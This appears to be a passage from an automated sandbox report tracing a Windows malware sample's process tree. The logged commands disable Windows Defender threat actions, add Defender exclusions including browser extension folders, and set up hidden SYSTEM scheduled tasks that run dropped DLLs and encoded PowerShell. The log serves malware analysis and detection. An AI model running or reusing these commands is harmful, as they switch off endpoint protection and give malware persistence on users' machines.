\"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GMSjHEOgNPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GMSjHEOgNPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KorSFqdQtYRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KorSFqdQtYRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KwCCzMbLU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KwCCzMbLU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XBWMRbUXfmiUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XBWMRbUXfmiUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rsBcJxCcWvMYeshHoVR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rsBcJxCcWvMYeshHoVR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iqSdQZanzWATcrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\iqSdQZanzWATcrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xGckbeqHiGwifhCDG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\xGckbeqHiGwifhCDG\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EHIXdycWpFSJkSHq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EHIXdycWpFSJkSHq\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMSjHEOgNPUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMSjHEOgNPUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMSjHEOgNPUn" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KorSFqdQtYRU2" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KorSFqdQtYRU2" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KwCCzMbLU" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KwCCzMbLU" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XBWMRbUXfmiUC" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XBWMRbUXfmiUC" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rsBcJxCcWvMYeshHoVR" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rsBcJxCcWvMYeshHoVR" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iqSdQZanzWATcrVB /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\iqSdQZanzWATcrVB /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xGckbeqHiGwifhCDG /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\xGckbeqHiGwifhCDG /t REG_DWORD /d 0 /reg:643⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EHIXdycWpFSJkSHq /t REG_DWORD /d 0 /reg:323⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EHIXdycWpFSJkSHq /t REG_DWORD /d 0 /reg:643⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grkXLfext" /SC once /ST 09:35:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grkXLfext"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grkXLfext"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pnPsUKnfnoEJVAtbZ" /SC once /ST 05:35:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EHIXdycWpFSJkSHq\KmVWKxRzianuNHi\zViZCTU.exe\" lU /YkXodidVV 757674 /S" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "pnPsUKnfnoEJVAtbZ"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 8082⤵
- Program crash
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\EHIXdycWpFSJkSHq\KmVWKxRzianuNHi\zViZCTU.exeC:\Windows\Temp\EHIXdycWpFSJkSHq\KmVWKxRzianuNHi\zViZCTU.exe lU /YkXodidVV 757674 /S1⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bSqDvJefqHHToWFkhX"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KwCCzMbLU\jqZSjL.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "LBkQMkaOkePFaGy" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LBkQMkaOkePFaGy2" /F /xml "C:\Program Files (x86)\KwCCzMbLU\IHoYIZu.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LBkQMkaOkePFaGy"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LBkQMkaOkePFaGy"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IGVxyrrDZpMMZk" /F /xml "C:\Program Files (x86)\KorSFqdQtYRU2\FMnklud.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uxtdTnDgDVVnV2" /F /xml "C:\ProgramData\iqSdQZanzWATcrVB\GsqqVkx.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MrVIgsKRJJEXZkYHw2" /F /xml "C:\Program Files (x86)\rsBcJxCcWvMYeshHoVR\YwURFeX.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vePANJsyasiLtlcPAko2" /F /xml "C:\Program Files (x86)\XBWMRbUXfmiUC\jaDPsOr.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KaffSBjvdLDqnEDfT" /SC once /ST 02:19:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\EHIXdycWpFSJkSHq\mBZSJHSC\EiLWlmo.dll\",#1 /fdidJkwz 757674" /V1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "KaffSBjvdLDqnEDfT"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QIRqA1" /SC once /ST 09:20:32 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QIRqA1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QIRqA1"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "pnPsUKnfnoEJVAtbZ"2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 25362⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5232 -ip 52321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2892 -ip 28921⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EHIXdycWpFSJkSHq\mBZSJHSC\EiLWlmo.dll",#1 /fdidJkwz 7576741⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\EHIXdycWpFSJkSHq\mBZSJHSC\EiLWlmo.dll",#1 /fdidJkwz 7576742⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KaffSBjvdLDqnEDfT"3⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2892 -ip 28921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2892 -ip 28921⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff960003cb8,0x7ff960003cc8,0x7ff960003cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,102076790943303402,13384160346955394847,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2024 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,102076790943303402,13384160346955394847,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:32⤵
-
-
